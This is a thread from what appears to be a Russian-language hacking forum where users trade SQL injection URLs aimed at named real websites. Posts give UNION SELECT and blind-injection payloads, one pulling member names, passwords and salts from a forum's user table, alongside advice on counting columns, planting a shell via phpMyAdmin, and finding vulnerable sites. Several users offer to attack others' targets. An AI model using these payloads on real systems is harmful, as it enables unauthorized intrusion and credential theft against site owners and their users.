Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Jerri

    Jerri Level 8

    Joined:
    12 Jul 2009
    Messages:
    137
    Likes Received:
    376
    Reputations:
    22
    Code:
    http://www.pimaair.org/collection-detail.php?cid=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41
    хз,что делать.=\ Не раскрутить. Посмотрите плз,что сделать в данной ситуации можно...
     
  2. warlok

    warlok Elder - Старейшина

    Joined:
    17 Feb 2008
    Messages:
    337
    Likes Received:
    142
    Reputations:
    81
    как слепую
    Code:
    http://www.pimaair.org/collection-detail.php?cid=1+and+substring(version(),1,1)=4
    
     
  3. Jerri

    Jerri Level 8

    Joined:
    12 Jul 2009
    Messages:
    137
    Likes Received:
    376
    Reputations:
    22
    ага,спс.
     
  4. street16

    street16 Elder - Старейшина

    Joined:
    18 Sep 2006
    Messages:
    42
    Likes Received:
    5
    Reputations:
    1
    есть сайт!выдает ошибку You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near.
    Пробу.1+order+by+50000000000000000000/*Все что до этого числа выдается ошибкой.Unknown column '5000000000000000000' in 'order clause'Это как понять?это чё столько полей??
     
  5. Root-access

    Root-access Elder - Старейшина

    Joined:
    18 Jun 2008
    Messages:
    194
    Likes Received:
    195
    Reputations:
    91
    Полей меньше, подбирай число, пока ошибки нет.
     
  6. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    2,007
    Likes Received:
    996
    Reputations:
    155
    Слишком уж много ты полей поставил :) Ссылку кинь, раскрутим :)
     
  7. street16

    street16 Elder - Старейшина

    Joined:
    18 Sep 2006
    Messages:
    42
    Likes Received:
    5
    Reputations:
    1
    Просто мой первый ресурс.Хотелось бы самому!
    Да все уже перепробывал все что до этого числа идет ошибка!
     
  8. RulleR

    RulleR Elder - Старейшина

    Joined:
    12 Jun 2008
    Messages:
    166
    Likes Received:
    439
    Reputations:
    313
    2 Nightmarе
    или так
    Code:
    http://www.webdevsforum.com/index.php?page=search&topic=1&pf=1&search=xek&author_id=1&forums[]=1)union(select+1,2,3,4,concat_ws(0x3a,name,password,pass_salt),6,7,8,9+from+forum_members+where+id=1)+--+
     
    2 people like this.
  9. jecka3000

    jecka3000 Elder - Старейшина

    Joined:
    15 Mar 2008
    Messages:
    372
    Likes Received:
    54
    Reputations:
    4
    что можно поиметь с этого: _http://vulns.ru/myadmin/scripts/setup.php
    реально ли добавить новую БД или попасть в текущую?
     
  10. Root-access

    Root-access Elder - Старейшина

    Joined:
    18 Jun 2008
    Messages:
    194
    Likes Received:
    195
    Reputations:
    91
    Там нет директории конфига, поэтому перезаписать конфиг шеллом не получится.
     
  11. jecka3000

    jecka3000 Elder - Старейшина

    Joined:
    15 Mar 2008
    Messages:
    372
    Likes Received:
    54
    Reputations:
    4
    Root-access, ясно, то есть ничего полезного из этого не сделаешь?
     
    1 person likes this.
  12. Root-access

    Root-access Elder - Старейшина

    Joined:
    18 Jun 2008
    Messages:
    194
    Likes Received:
    195
    Reputations:
    91
    Ну хз, разве что если в этом скрипте есть инъекция или хсс.
     
    1 person likes this.
  13. Paul_Eckman

    Paul_Eckman Member

    Joined:
    10 Nov 2009
    Messages:
    55
    Likes Received:
    65
    Reputations:
    10
    По вашему опыту: хсс-уязвимости могут быть на сайтах на базе ucoz.ru, at.ua, yandex.ru и т.п.?
     
  14. wildshaman

    wildshaman Elder - Старейшина

    Joined:
    16 Apr 2008
    Messages:
    530
    Likes Received:
    494
    Reputations:
    99
    Были\есть на всех вышеуказанных сервисах.
     
  15. Paul_Eckman

    Paul_Eckman Member

    Joined:
    10 Nov 2009
    Messages:
    55
    Likes Received:
    65
    Reputations:
    10
    Спасибо! Обнаруживаются только с помощью сканеров или вручную тоже можно?
     
  16. wildshaman

    wildshaman Elder - Старейшина

    Joined:
    16 Apr 2008
    Messages:
    530
    Likes Received:
    494
    Reputations:
    99
    Только вручную, о каких сканерах может в таких сулчаях ерчь идти вообще оО
     
  17. Paul_Eckman

    Paul_Eckman Member

    Joined:
    10 Nov 2009
    Messages:
    55
    Likes Received:
    65
    Reputations:
    10
    Не знаю) Я в этом деле пока ламер. :) Несколько штук обнаруживала вручную, но говорят, что со сканерами эффективнее.
     
  18. wildshaman

    wildshaman Elder - Старейшина

    Joined:
    16 Apr 2008
    Messages:
    530
    Likes Received:
    494
    Reputations:
    99
    Сканеры для лолов
     
  19. Gidz

    Gidz New Member

    Joined:
    10 Aug 2009
    Messages:
    29
    Likes Received:
    4
    Reputations:
    0
    Народ, прошу не пинать сильно, только сегодня начал разбираться, читаю сейчас про sql инъекции, не совсем понятно, как находить подходящие(уязвимые) сайты. Тоесть например нужно ли искать по какому-то определенному запросу в поисковике или какой-то есть софт подходящий для этого? Хотел бы попробовать поэкспериментировать, но блин не могу ничего подходящего найти.
     
Loading...
Thread Status:
Not open for further replies.